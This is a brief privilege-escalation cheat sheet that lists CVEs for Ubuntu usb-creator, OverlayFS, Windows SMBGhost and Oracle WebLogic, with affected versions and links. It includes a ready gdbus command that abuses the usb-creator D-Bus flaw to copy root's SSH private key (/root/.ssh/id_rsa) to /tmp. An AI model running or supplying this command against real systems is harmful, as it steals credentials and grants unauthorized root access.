Privilege Escalation

Linux

CVE-2015-3643: usb-creator before 0.2.38.3ubuntu0.1 on Ubuntu 12.04 LTS, before 0.2.56.3ubuntu0.1 on Ubuntu 14.04 LTS, before 0.2.62ubuntu0.3 on Ubuntu 14.10, and before 0.2.67ubuntu0.1 on Ubuntu 15.04 allows local users to gain privileges by leveraging a missing call check_polkit for the KVMTest method.

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image <target file> <destination>
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/pwn true

Reference: https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

CVE-2021-3493: Ubuntu OverlayFS Local Privesc.

  • Ubuntu 20.10

  • Ubuntu 20.04 LTS

  • Ubuntu 18.04 LTS

  • Ubuntu 16.04 LTS

  • Ubuntu 14.04 ESM

Windows

CVE-2020-0796 (SMBGhost): https://github.com/rapid7/metasploit-framework/pull/15024

Weblogic

CVE-2020-14882: Oracle WebLogic Remote Code Execution

Affected versions: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0